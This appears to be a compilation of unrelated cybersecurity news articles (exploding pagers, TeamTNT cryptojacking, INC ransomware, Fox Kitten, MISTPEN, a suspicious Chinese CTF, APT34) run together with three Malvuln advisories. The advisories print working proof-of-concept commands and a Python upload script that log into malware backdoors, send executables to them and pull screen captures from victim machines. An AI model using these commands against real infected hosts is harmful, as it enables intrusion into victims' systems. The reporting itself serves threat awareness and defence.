Thousands of beepers and two-way radios exploded in attacks against Hezbollah, but mainstream consumer devices like smartphones aren’t likely to be weaponized the same way.

For two days this week, Hezbollah has been rocked by a series of small explosions across Lebanon, injuring thousands and killing at least 25. But these attacks haven’t come from rockets or drones. Instead, they’ve resulted from boobytrapped electronics—including pagers, walkie-talkies, and even, reportedly, solar equipment—detonating in coordinated waves. As details come into view of the elaborate supply chain attack that compromised these devices, citizens on the ground in Lebanon and people around the world are questioning whether such attacks could target any device in your pocket.

The campaign to compromise key Hezbollah communication infrastructure with explosives was clearly elaborate and involved. The operation, which is widely believed to have been perpetrated by Israel, goes far beyond past examples of hardware supply chain attacks and may be a source of inspiration for future spycraft around the world. But sources tell WIRED that the specific scale and scope of the effort would not be easily replicated in other contexts. And, more broadly, the resources and precision involved in carrying out such an attack would be prohibitively difficult to maintain over time for key consumer devices like smartphones—which are used so widely and regularly scrutinized by researchers, product testers, and repair technicians.

“I do think there is absolutely potential to see more of this in the longer term, not targeting civilians, but generally targeting other military actors,” says Zachary Kallenborn, an adjunct nonresident fellow with the Center for Strategic and International Studies. Kallenborn says militaries are increasingly relying on commercial technology—from drones to communications devices—all of which could be compromised if supply chains can be exploited by adversaries. “These systems are being sourced from all over the globe,” he says. “What that means, then, is that you also have these global supply chains supporting them.”

While full details of the attacks are still coming to light, the devices that detonated were seemingly compromised with explosives before they arrived in Hezbollah members’ hands. Alan Woodward, a cybersecurity professor at the University of Surrey, says he suspects that an attacker would plant explosives in a device during the manufacturing process, rather than intercepting gadgets after they are finished and then taking them apart to plant explosives. Reporting by the New York Times on Wednesday evening seemed to confirm this theory, indicating that Israel directly manufactured the compromised devices via shell companies. Israel has not commented on any of the attacks.

Early theories that cyberattacks caused device batteries to overheat and explode have been ruled out by cybersecurity experts. The force of the blasts seen in on-the-ground footage would not be consistent with battery fires or explosions, especially given the small size of pager and walkie-talkie batteries.

Lebanon’s political landscape and ongoing economic crisis, coupled with regional fighting between Hezbollah and Israel, created specific opportunities for sabotage. Hezbollah is isolated globally, with countries like the United States and United Kingdom classifying it as a terrorist organization while other countries, such as Russia and China, maintain relations. This impacts Hezbollah’s avenues for importing equipment and vetting suppliers.

Amid ongoing violent conflict with Israel, Hezbollah’s digital communications and activities are also under constant barrage from Israeli hackers. In fact, this constant digital assault reportedly played a role in pushing Hezbollah away from smartphone communication and toward pagers and walkie-talkies in the first place. “Your phone is their agent,” Hezbollah leader Hassan Nasrallah said in February, referring to Israel.

The commercial spyware industry has shown it is possible to fully compromise target smartphones by exploiting chains of vulnerabilities in their mobile operating systems. Developing spyware and repeatedly finding new operating system vulnerabilities as older ones are patched is a resource-intensive process, but it is still less complicated and risky than conducting a hardware supply chain attack to physically compromise devices during or shortly after manufacturing. And for an attacker, monitoring a target’s entire digital life on a smartphone or laptop is likely more valuable than the device’s potential as a bomb.

“I’d hazard a guess that the only reason we aren’t hearing about exploding laptops is that they’re collecting too much intelligence from those,” says Jake Williams, vice president of research and development at Hunter Strategy, who formerly worked for the US National Security Agency. “I think there’s also potentially an element of targeting, too. The pagers and personal radios could pretty reliably be expected to stay in the hands of Hezbollah operatives, but more general purpose electronics like laptops could not.”

There are other more practical reasons, too, that the attacks in Lebanon are unlikely to portend a global wave of exploding consumer electronics anytime soon. Unlike portable devices that were originally designed in the 20th century, the current generation of laptops and particularly smartphones are densely packed with hardware components to offer the most features and the longest battery life in the most efficient package possible.

University of Surrey’s Woodward, who regularly takes apart consumer devices, points out that within modern smartphones there is very limited space to insert anything extra, and the manufacturing process can involve robots precisely placing components on top of each other. X-rays show how tightly packed modern phones are.

“When you open up a smartphone, I think the only way to get any sort of meaningful amount of high explosive in there would be to do something like replace one of the components,” he says, such as modifying a battery to be half battery, half explosives. But “replacing a component in a smartphone would compromise its functionality,” he says, which could lead a user to investigate the malfunction.

In contrast, the model of pager linked to the explosions—a “rugged” device with 85 days of battery life—included multiple replaceable parts. Ang Cui, founder of the embedded device security firm Red Balloon Security, examined the schematics of the pager model apparently used in the attacks and told WIRED that there would be free space inside to plant explosives. The walkie-talkies that exploded, according to the manufacturer, were discontinued a decade ago. Woodward says that when opening up redesigned, current versions of older technologies, such as pagers, many internal electronic components have been “compressed” down as manufacturing methods and processor efficiency have improved.

Smartphone production lines also operate under stricter security measures, especially for high-cost devices like Apple’s iPhones and Google’s flagship Pixel phones. This is partly to guarantee production quality, but also to ensure that employees don’t leak trade secrets or prototypes. Not all low-end Android phones are manufactured with such intense oversight, but it would be more difficult to secretly take over manufacturing of a smartphone than a forgotten pager model. In countries like China, where many devices are manufactured, there is always the possibility of a domestic operation to plant backdoors, but such a scheme would need to be elaborate to skirt international scrutiny of the devices

To find exploding cell phones, you have to go back to 20th century tech. In 1996, Palestinian bombmaker Yahya Ayyash was killed when his mobile phone exploded as he answered a call. His old-style phone—which the New York Times said was ”reportedly a small, slim model that fits in a pocket”—had 50 grams of explosives planted inside it, likely by Israel’s security services. The explosion was reportedly triggered by a radio signal emitted from a plane flying above. And unlike the pager and walkie-talkie attacks this week, Ayyash’s phone was part of a highly targeted attack on him alone.

Even if this week’s exploding device campaign doesn’t have immediate implications for every smartphone in every pocket, though, it expands enormously the specter of hardware supply chain attacks.

“I think that every shady organization worldwide will now be checking their new devices—especially those ordered in bulk from the manufacturer—for explosives,” says a longtime hardware hacker and tech procurement specialist who asked to be identified as Null Pointer. “This hit so hard because it was novel and no one in that community knew to look for it. It's ingenious.”

Your Phone Won’t Be the Next Exploding Pager

The cryptojacking operation known as TeamTNT has likely resurfaced as part of a new campaign targeting Virtual Private Server (VPS) infrastructures based on the CentOS operating system.
"The initial access was accomplished via a Secure Shell (SSH) brute force attack on the victim's assets, during which the threat actor uploaded a malicious script," Group-IB researchers Vito Alfano and Nam Le

Cryptojacking / Cloud Security

The cryptojacking operation known as **TeamTNT** has likely resurfaced as part of a new campaign targeting Virtual Private Server (VPS) infrastructures based on the CentOS operating system.

"The initial access was accomplished via a Secure Shell (SSH) brute force attack on the victim's assets, during which the threat actor uploaded a malicious script," Group-IB researchers Vito Alfano and Nam Le Phuong said in a Wednesday report.

The malicious script, the Singaporean cybersecurity company noted, is responsible for disabling security features, deleting logs, terminating cryptocurrency mining processes, and inhibiting recovery efforts.

The attack chains ultimately pave the way for the deployment of the Diamorphine rootkit to conceal malicious processes, while also setting up persistent remote access to the compromised host.

The campaign has been attributed to TeamTNT with moderate confidence, citing similarities in the tactics, techniques, and procedures (TTPs) observed.

TeamTNT was first discovered in the wild in 2019, undertaking illicit cryptocurrency mining activities by infiltrating cloud and container environments. While the threat actor bid farewell in November 2021 by announcing a "clean quit," public reporting has uncovered several campaigns undertaken by the hacking crew since September 2022.

The latest activity linked to the group manifests in the form of a shell script that first checks if it was previously infected by other cryptojacking operations, after which it precedes to impair device security by disabling SELinux, AppArmor, and the firewall.

Changes implemented on ssh service

"The script searches for a daemon related to the cloud provider Alibaba, named aliyun.service," the researchers said. "If it detects this daemon, it downloads a bash script from update.aegis.aliyun.com to uninstall the service."

Besides killing all competing cryptocurrency mining processes, the script takes steps to execute a series of commands to remove traces left by other miners, terminate containerized processes, and remove images deployed in connection with any coin miners.

Furthermore, it establishes persistence by configuring cron jobs that download the shell script every 30 minutes from a remote server (65.108.48\[.\]150) and modifying the "/root/.ssh/authorized\_keys" file to add a backdoor account.

"It locks down the system by modifying file attributes, creating a backdoor user with root access, and erasing command history to hide its activities," the researchers noted. "The threat actor leaves nothing to chance; indeed, the script implements various changes within the SSH and firewall service configuration."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New TeamTNT Cryptojacking Campaign Targets CentOS Servers with Rootkit

Microsoft has revealed that a financially motivated threat actor has been observed using a ransomware strain called INC for the first time to target the healthcare sector in the U.S.
The tech giant's threat intelligence team is tracking the activity under the name Vanilla Tempest (formerly DEV-0832).
"Vanilla Tempest receives hand-offs from GootLoader infections by the threat actor Storm-0494,

Microsoft has revealed that a financially motivated threat actor has been observed using a ransomware strain called INC for the first time to target the healthcare sector in the U.S.

The tech giant's threat intelligence team is tracking the activity under the name **Vanilla Tempest** (formerly DEV-0832).

"Vanilla Tempest receives hand-offs from GootLoader infections by the threat actor Storm-0494, before deploying tools like the Supper backdoor, the legitimate AnyDesk remote monitoring and management (RMM) tool, and the MEGA data synchronization tool," it said in a series of posts shared on X.

In the next step, the attackers proceed to carry out lateral movement through Remote Desktop Protocol (RDP) and then use the Windows Management Instrumentation (WMI) Provider Host to deploy the INC ransomware payload.

The Windows maker said Vanilla Tempest has been active since at least July 2022, with previous attacks targeting education, healthcare, IT, and manufacturing sectors using various ransomware families such as BlackCat, Quantum Locker, Zeppelin, and Rhysida.

It's worth noting that the threat actor is also tracked under the name Vice Society, which is known for employing already existing lockers to carry out their attacks, as opposed to building a custom version of their own.

The development comes as ransomware groups like BianLian and Rhysida have been observed increasingly using Azure Storage Explorer and AzCopy to exfiltrate sensitive data from compromised networks in an attempt to evade detection.

"This tool, used for managing Azure storage and objects within it, is being repurposed by threat actors for large-scale data transfers to cloud storage," modePUSH researcher Britton Manahan said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Warns of New INC Ransomware Targeting U.S. Healthcare Sector

Censys uncovers the hidden infrastructure of Fox Kitten, an Iranian cyberespionage group. It reveals unique patterns, potential new…

Censys uncovers the hidden infrastructure of Fox Kitten, an Iranian cyberespionage group. It reveals unique patterns, potential new IOCs, and actionable recommendations to protect your organization from Fox Kitten attacks.

Censys, a threat hunting and attack surface management platform has released new details regarding the infrastructure of the Iranian cyberespionage group called Fox Kitten using data from a joint Cybersecurity Advisory (CSA) by the FBI, CISA, and DC3. Censys identified a significant number of additional hosts that likely belong to the Fox Kitten infrastructure, expanding the scope of the threat.

In its report, shared with Hackread.com ahead of its publication on Wednesday, Censys illuminated the unique patterns and potentially new indicators of compromise used by Fox Kitten, which is known for targeting organizations worldwide.

Using these patterns, Censys could find previously undiscovered active hosts that boasted matching patterns and Autonomous Systems (ASs) such as Hosts D, E, and G, which could be part of the same infrastructure and may be used in future attacks. Matching domain IOCs were used to identify Host G, and matching ASs were used to identify Hosts J & C.

The data was analyzed using techniques like Host Profiling, Pattern Recognition, Link Analysis, and Historical Analysis. Host profiling involves analyzing individual hosts’ characteristics, pattern recognition identifies recurring patterns, link analysis examines relationships between infrastructure elements, and historical analysis compares current data with historical records to identify trends.

Further probing revealed that the attackers used various techniques to obfuscate their infrastructure, such as using dynamic IP addresses, distributing infrastructure across multiple Autonomous Systems (ASNs), and using misleading certificate names to disguise malicious activity.

Censys found two domain IOCs (api.gupdate.net and githubapp.net) on active IPs not listed in the CSA. Some domain IOCs were found on Fox Kitten IPs before or after the CSA timeframe. All domain IOCs were found in 64 valid certificates, requiring further monitoring.

Further research revealed commonalities such as geolocation in London, Stockholm, Frankfurt, Tel Aviv, and Los Angeles, shared Autonomous Systems (AS) numbers, unique patterns in Hosts D, E, and G, timeframe discrepancies on some hosts outside the CSA timeframe, and 38,862 additional potentially malicious hosts with similar characteristics. These findings suggest a honeypot-like design and a potential connection between the hosts.

By delving deeper into the Fox Kitten infrastructure, Censys has provided valuable insights into the group’s operations and tactics. These patterns and commonalities can be used to identify other active hosts and certificates that may be part of the same Fox Kitten infrastructure.

Defenders can use IOCs and known periods of nefarious activity to study host and certificate profiles before, during, and after reported attacks, conduct dynamic searches across public scan datasets like Censys to observe how threats may set up new infrastructure, and stay ahead of threat actors.

1.  **Iranian State Hackers Partner Up for Large-Scale Attacks, Report**
2.  **Iran’s MuddyWater Hits Saudis and Israelis with BugSleep Backdoor**
3.  **Iranian Hackers Team Up with Ransomware Gangs in Attacks on US**
4.  **Iran’s Peach Sandstorm Deploy FalseFont Backdoor in Defense Sector**
5.  **Iran’s Mint Sandstorm APT Hits Universities with Hamas-Israel Phishing**

Censys Uncovers Hidden Infrastructure of Iranian Fox Kitten Group

Backdoor.Win32.CCInvader.10 malware suffers from a bypass vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/cb86af8daa35f6977c80814ec6e40d63.txtContact: malvuln13@gmail.comMedia: x.com/malvuln  Threat: Backdoor.Win32.CCInvader.10Vulnerability: Authentication BypassDescription: The malware runs an FTP server.  Third-party adversarys who can reach infected systems can logon using any username/password combination. Intruders may then upload executables using ftp PASV, STOR commands.Family: CCInvaderType: PE32MD5: cb86af8daa35f6977c80814ec6e40d63SHA256: 8420788f3a575cade5f579bcbf56bb67566bca27c2b9d11dbbafffadef491f31Vuln ID: MVID-2024-0694Disclosure: 09/17/2024Exploit/PoC:ncat64.exe 192.168.18.125 21220 ICS FTP Server readyUSER gg331 Password required for ggPASS gg230 User gg logged in.SYST215 UNIX Type: L8 Internet Component Suite250 CWD command successful. "C:/" is current directory.PWD257 "C:/" is current directory.PASV227 Entering Passive Mode (192,168,18,125,243,249).STOR DOOM.exe150 Opening data connection for DOOM.exe.226 File received okfrom socket import *MALWARE_HOST="192.168.18.125"PORT=62457   #243 x 256 + 249DOOM="DOOM.exe"def doit():    s=socket(AF_INET, SOCK_STREAM)    s.connect((MALWARE_HOST, PORT))    f = open(DOOM, "rb")    EXE = f.read()    s.send(EXE)    while EXE:        s.send(EXE)        EXE=f.read()    s.close()    print("By Malvuln");if __name__=="__main__":    doit()Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.CCInvader.10 MVID-2024-0694 Authentication Bypass

Backdoor.Win32.BlackAngel.13 malware suffers from a code execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/d1523df44da5fd40df92602b8ded59c8.txtContact: malvuln13@gmail.comMedia: x.com/malvuln  Threat: Backdoor.Win32.BlackAngel.13Vulnerability: Unauthenticated Remote Command ExecutionDescription: The malware listens on TCP port 1850. Third party adversaries who can reach an infected host can issue commands made available by the backdoor. Example, send messages to victim "!msg", open launch the browser and open webpages "!url" etc.Family: BlackAngelType: PE32MD5: d1523df44da5fd40df92602b8ded59c8SHA256: 8a6e876f7452ae0a11342b852c70771a7f80b87c2e451656aaebb18b350c4b27Vuln ID: MVID-2024-0695Disclosure: 09/17/2024Exploit/PoC:nc64.exe x.x.x.x 1850Connected to host (DESKTOP-3C4IQJO)                                                                                                                                                                                                              !msg GG Forever!!msg Greetz Edu_Braun_0day, Indoushka, Dirty0tis!url https://hyp3rlinx.altervista.org/advisories/MICROSOFT-MSINFO32-XXE-FILE-EXFILTRATION.txt!quit[commands list]!msg!opencd!closecd!exitwin!reboot!logoff!getdrive!gettree!getfile!putfile!ren!del!swap!noswap!mdisable!kdisable!url!bck!sound!txt!dos!beep!nobeep!quit!hangDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.BlackAngel.13 MVID-2024-0695 Code Execution

Backdoor.Win32.Delf.yj malware suffers from an information leakage vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/f991c25f1f601cc8d14dca4737415238.txtContact: malvuln13@gmail.comMedia: x.com/malvuln  Threat: Backdoor.Win32.Delf.yjVulnerability: Information DisclosureDescription: The malware listens on TCP port 8080. Third-party adversaries who can reach an infected system, can  download screen captures of a victims machine by making a simple HTTP GET request.Family: DelfType: PE32MD5: f991c25f1f601cc8d14dca4737415238SHA256: 512af3cc193e9cb7f0b6204889bc457affded79aa62c41ab20a74625e4279caaVuln ID: MVID-2024-0693Dropped files: dxdiag.scrDisclosure: 09/17/2024Exploit/PoC:curl 192.168.18.125:8080  --output victim.jpg  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current                                 Dload  Upload   Total   Spent    Left  Speed100  106k  100  106k    0     0   338k      0 --:--:-- --:--:-- --:--:--  341kDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Delf.yj MVID-2024-0693 Information Disclosure

A North Korea-linked cyber-espionage group has been observed leveraging job-themed phishing lures to target prospective victims in energy and aerospace verticals and infect them with a previously undocumented backdoor dubbed MISTPEN.
The activity cluster is being tracked by Google-owned Mandiant under the moniker UNC2970, which it said overlaps with a threat group known as TEMP.Hermit, which is

Cyber Espionage / Malware

A North Korea-linked cyber-espionage group has been observed leveraging job-themed phishing lures to target prospective victims in energy and aerospace verticals and infect them with a previously undocumented backdoor dubbed MISTPEN.

The activity cluster is being tracked by Google-owned Mandiant under the moniker **UNC2970**, which it said overlaps with a threat group known as TEMP.Hermit, which is also broadly called Lazarus Group or Diamond Sleet (formerly Zinc).

The threat actor has a history of targeting government, defense, telecommunications, and financial institutions worldwide since at least 2013 to collect strategic intelligence that furthers North Korean interests. It's affiliated with the Reconnaissance General Bureau (RGB).

The threat intelligence firm said it has observed UNC2970 singling out various entities located in the U.S., the U.K., the Netherlands, Cyprus, Sweden, Germany, Singapore, Hong Kong, and Australia.

"UNC2970 targets victims under the guise of job openings, masquerading as a recruiter for prominent companies," it said in a new analysis, adding it copies and modifies job descriptions according to their target profiles.

"Moreover, the chosen job descriptions target senior-/manager-level employees. This suggests the threat actor aims to gain access to sensitive and confidential information that is typically restricted to higher-level employees."

The attack chains, also known as Operation Dream Job, entail the use of spear-phishing lures to engage with victims over email and WhatsApp in an attempt to build trust, before sending across a malicious ZIP archive file that's dressed up as a job description.

In an interesting twist, the PDF file of the description can only be opened with a trojanized version of a legitimate PDF reader application called Sumatra PDF included within the archive to deliver MISTPEN by means of a launcher referred to as BURNBOOK.

It's worth noting that this does not imply a supply chain attack nor is there a vulnerability in the software. Rather the attack has been found to employ an older Sumatra PDF version that has been repurposed to activate the infection chain.

This is a tried-and-tested method adopted by the hacking group as far back as 2022, with both Mandiant and Microsoft highlighting the use of a wide range of open-source software, including PuTTY, KiTTY, TightVNC, Sumatra PDF Reader, and muPDF/Subliminal Recording software installer for these attacks.

It's believed that the threat actors likely instruct the victims to open the PDF file using the enclosed weaponized PDF viewer program to trigger the execution of a malicious DLL file, a C/C++ launcher called BURNBOOK.

"This file is a dropper for an embedded DLL, 'wtsapi32.dll,' which is tracked as TEARPAGE and used to execute the MISTPEN backdoor after the system is rebooted," Mandiant researchers said. "MISTPEN is a trojanized version of a legitimate Notepad++ plugin, binhex.dll, which contains a backdoor."

TEARPAGE, a loader embedded within BURNBOOK, is responsible for decrypting and launching MISTPEN. A lightweight implant written in C, MISTPEN is equipped to download and execute Portable Executable (PE) files retrieved from a command-and-control (C2) server. It communicates over HTTP with the following Microsoft Graph URLs.

Mandiant also said it uncovered older BURNBOOK and MISTPEN artifacts, suggesting that they are being iteratively improved to add more capabilities and allow them to fly under the radar. The early MISTPEN samples have also been discovered using compromised WordPress websites as C2 domains.

"The threat actor has improved their malware over time by implementing new features and adding a network connectivity check to hinder the analysis of the samples," the researchers said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

North Korean Hackers Target Energy and Aerospace Industries with New MISTPEN Malware

Participants in a hacking competition with ties to China’s military were, unusually, required to keep their activities secret, but security researchers say the mystery only gets stranger from there.

Capture the flag hacking contests at security conferences generally serve two purposes: to help participants develop and demonstrate computer hacking and security skills, and to assist employers and government agencies with discovering and recruiting new talent.

But one security conference in China may have taken its contest a step further—potentially using it as a secret espionage operation to get participants to collect intelligence from an unknown target.

According to two Western researchers who translated documentation for China’s Zhujian Cup, also known as the National Collegiate Cybersecurity Attack and Defense Competition, one part of the three-part competition, held last year for the first time, had a number of unusual characteristics that suggest its potentially secretive and unorthodox purpose.

Capture the flag (CTF) and other types of hacking competitions are generally hosted on closed networks or “cyber ranges”—dedicated infrastructure set up for the contest so that participants don’t risk disrupting real networks. These ranges provide a simulated environment that mimics real-world configurations, and participants are tasked with finding vulnerabilities in the systems, obtaining access to specific parts of the network, or capturing data.

There are two major companies in China that set up cyber ranges for competitions. The majority of the competitions give a shout out to the company that designed their range. Notably, Zhujian Cup didn’t mention any cyber range or cyber range provider in its documentation, leaving the researchers to wonder if this is because the contest was held in a real environment rather than a simulated one.

The competition also required students to sign a document agreeing to several unusual terms. They were prohibited from discussing the nature of the tasks they were asked to do in the competition with anyone; they had to agree not to destroy or disrupt the targeted system; and at the end of the competition, they had to delete any backdoors they planted on the system and any data they acquired from it. And unlike other competitions in China the researchers examined, participants in this portion of the Zhujian Cup were prohibited from publishing social media posts revealing the nature of the competition or the tasks they performed as part of it.

Participants also were prohibited from copying any data, documents, or printed materials that were part of the competition; disclosing information about vulnerabilities they found; or exploiting those vulnerabilities for personal purposes. If a leak of any of this data or material occurred and caused harm to the contest organizers or to China, according to the pledge that participants signed, they could be held legally responsible.

“I promise that if any information disclosure incident (or case) occurs due to personal reasons, causing loss or harm to the organizer and the country, I, as an individual, will bear legal responsibility in accordance with the relevant laws and regulations,” the pledge states.

The contest was hosted last December by Northwestern Polytechnical University, a science and engineering university in Xi'an, Shaanxi, that is affiliated with China’s Ministry of Industry and Information Technology and also holds a top-secret clearance to conduct work for the Chinese government and military. The university is overseen by China’s People’s Liberation Army.

Neither the university nor several cosponsors of the contest responded to WIRED’s inquiry about the competition.

Dakota Cary, a strategic advisory consultant at security firm Sentinel One, and Eugenio Benincasa, senior cyber defense researcher at the Center for Security Studies at ETH Zurich university in Switzerland, discovered the unusual contest and its requirements while researching China’s hacking competitions. The two have written a report for the Atlantic Council and plan to present their findings on Thursday at the Labscon security conference in Arizona.

They acknowledge that there is no hard evidence that the competition was used to attack a real-world target and that the evidence they do have is circumstantial. But they said they are 85 percent confident that this is what occurred because no alternative explanations make sense.

“There are a lot of good alternative explanations, and none of them have supporting evidence,” says Cary, who is fluent in Mandarin and has studied China’s offensive hacking capabilities extensively for years.

One possible alternative is that the target of the attack was a domestic company or organization that cooperated with the contest in order to give students experience in finding vulnerabilities in a real network and also provide the company with a threat assessment that could help it better secure its network against real-world adversaries.

Cary, however, says such exercises in China are called “crowd-testing” contests. But nowhere in the description of the Zhujian Cup does this phrase appear. “If it’s a real CTF exercise, why are \[participants\] deleting data and … backdoors?” he asks. And why are students told they could be held legally responsible if data or material they possess as part of the competition gets leaked? And if the students were attacking a target inside a cyber range, how could this cause “loss or harm to the organizer and the country,” per the wording in the pledge?

The competition was held on a weekend over the New Year’s holiday last year, on December 30 and 31. If the target was indeed a real-world network, the researchers note that holidays are often a time when security teams are short-staffed or less attentive and alert to intrusions. About 200 students from 29 schools participated in the weekend competition, which consisted of three parts, according to a description of the contest published by the school: a theoretical knowledge competition, a vulnerability discovery contest, and a “public-network target, actual combat attack competition.” The latter is the portion that Cary and Benincasa believe focused on a real-world target.

The researchers surveyed more than 120 capture-the-flag competitions organized in China since 2004—many of them held annually—to understand how the country has used such competitions to recruit talent and expand its cyber offensive and defensive capabilities. They say that China really began to focus on developing its cyber talent in 2015, after the Edward Snowden leaks had exposed the extensive hacking operations conducted by the US National Security Agency for intelligence purposes.

To strengthen its cyber defenses, China focused on revamping and expanding cybersecurity education programs and recruitment efforts between 2015 and 2021. A big part of the latter included the development and regulation of capture-the-flag competitions.

CTFs aren’t unique to China, of course; they are held around the world, including in the US, where one of the oldest—held annually at the Defcon hacking conference in Las Vegas—has existed for nearly two decades. The US government also hosts hackathons to help recruit talent, though not at the scale of China.

Since 2014, the researchers say, more than 540 capture-the-flag rounds of competition have occurred in China. The most intense activity began in 2018, which is also when China’s Central Cyberspace Affairs Commission and Ministry of Public Security issued a notice about the regulation and promotion of such contests. Now Chinese nationals must apply to the MPS for permission to participate in hacking competitions outside of China. Chinese leaders noticed Chinese students and security professionals were having great success competing in hacking competitions internationally and realized that each time someone from China won one of these competitions, the country was losing a potentially valuable asset with the vulnerabilities they disclosed as part of the contest. Now any vulnerabilities discovered by a Chinese national must be reported to the government and not disclosed publicly.

But importantly, China’s efforts in building its domestic capture-the-flag contests means that today it has one of the most robust hacking contest ecosystems in the world, the researchers say, including sector-specific ones for health care and law enforcement. The researchers estimate that about 300,000 people have participated in the contests over the last decade, but the researchers found only four that are open to students. The contests are led by universities across the country while also being supported by companies and the government. Contest winners and others who demonstrate good skill get entered into a national database.

Cary says that if the Zhujian Cup did involve a live target, it’s “remarkable” that the organizers put students in a position that could make them legally culpable if they got caught. But if so, it wouldn’t be the first time the government used students for intelligence operations. In 2022, the Financial Times reported that China had recruited unwitting university students to translate documents and data stolen in espionage operations conducted by the country’s hacking teams, reportedly without telling the students the source of the material.

This also may not be the first time a hacking competition in China played a role in a real-world breach subsequently attributed to China. In 2015, researchers at Threat Connect found curious evidence of a possible overlap between the TOPSEC Cup hacking competition coordinated by China’s Southeast University in 2014 and the subsequent hack of health care giant Anthem that same year. Southeast has financial connections to China’s civilian intelligence agency, the Ministry of State Security.

Did a Chinese University Hacking Competition Target a Real Victim?

Increasing attacks by the OilRig/APT34 group linked to Iran's Ministry of Intelligence and Security show that the nation's capabilities are growing, and targeting regional allies and enemies alike.

Source: Novikov Aleksey via Shutterstock

In its latest cyberattack on a Middle Eastern nation using its proxies in cyberspace, Iran continues to ramp up its cyber operations against rivals and allies.

In the attack, a cyberespionage group linked to Iran's Ministry of Intelligence and Security (MOIS) and known as APT34 targeted government ministries in Iraq, a nation that was once an enemy and now is sometimes a rival and sometimes an ally of Iran. The attack had all the hallmarks of the group, also known as Hazel Sandstorm: custom infrastructure using email tunneling for communications, use of two malware programs similar to previous APT34 code, and domain-naming schemes similar to previous operations.

Previous attacks by APT34 (aka OilRig, Helix Kitten, and Hazel Sandstorm) using similar tools and methods targeted other nations in the region, including Jordan, Lebanon, and Pakistan, according to an analysis by cybersecurity firm Check Point's research group.

"The goal is likely espionage, because those countries are at least, to some degree, allies of Iran, so I don't think, in this case, the main goal is destruction," says Sergey Shykevich, threat intelligence group manager at Check Point Research. "We also don't have any hints on the technological side that there is any destructive goal, and from what we do see — specifically in Iraq — we clearly see that the goal is data exfiltration and \[the like\]."

Following the start of the conflict between Israel and Hamas nearly a year ago, rivalries and relationships throughout the region have changed. In late spring, Iran criticized Jordan — and to a lesser extent other Arab nations — for reportedly helping Israel track and interdict missiles during Iran's April 13 attack on the Jewish nation. Meanwhile, Iraq continues to have strong ties to Iran through proxy networks and political parties aligned with Iran.

**Iran's Cyber Operations Grow**

At the same time, Iran has expanded its cyber operations strategy in the region. A group linked to the Iranian Islamic Revolutionary Guard Corps (IRGC) — and known variously as APT33 (Mandiant) and Peach Sandstorm (Microsoft) — has targeted communications equipment, government agencies, and the oil-and-gas industry in the United Arab Emirates and the United States, typically to gather intelligence, Microsoft stated in August.

Late last month, the US Cybersecurity and Infrastructure Security Agency (CISA) warned that the Iranian group Lemon Sandstorm, also known as Fox Kitten, had leveled ransomware attacks against various countries, and another group, Charming Kitten, or APT42, targeted individuals associated with both the Democratic and Republican presidential campaigns.

Iran is increasingly flexing its muscles in cyberspace, and especially against rivals throughout the Middle East region, says Mohamed Fahmy, a cyberthreat intelligence researcher with cybersecurity firm Trend Micro.

"Iranian APT groups, including APT34, have become very active recently in targeting the Middle East, particularly the government sector in the Gulf region," he says. "From what we’ve seen of APT34’s toolset and activities, they aim to infiltrate entities as much as possible, leveraging compromised infrastructure to launch further attacks. ... APT34's primary goals seem to be espionage and stealing sensitive government information."

**Evasive New Malware: Veaty and Spearal**

In the latest campaign, APT34 used fake document attachments targeting Iraq between March and May of this year, and likely used social engineering to convince users to open the links and run an installer. The attack results in the installation a .NET backdoor. Currently, one backdoor is called Veaty and the other Spearal, and both malware binaries allow command-and-control (C2) of compromised systems.

The techniques used by Veaty and Spearal show similarities to two other malware families — known as Karkoff and Saitama — both of which are attributed to APT34, Check Point stated in its analysis.

Iranian cyber operations groups tend to use custom DNS tunneling protocols and a C2 channel based on email subject lines, according to the research: "This distinctive blend of straightforward tools, written in .NET, combined with sophisticated C2 infrastructure, is common among similar Iranian threat actors."

The capabilities of APT34 and Iran's other groups will only increase, says Check Point's Shykevich.

"They just improve it," he says. "They just use the same content, but each target, or each country they attack, they deploy a new generation of the same concept ..., where they improve it and make it more stealthy \[or add other features\]."

Companies in the Middle East should focus on implementing a zero-trust architecture to strengthen defenses, including establishing a mature security operations center (SOC) with managed endpoint detection and response (MDR) capabilities, says Trend Micro's Fahmy.

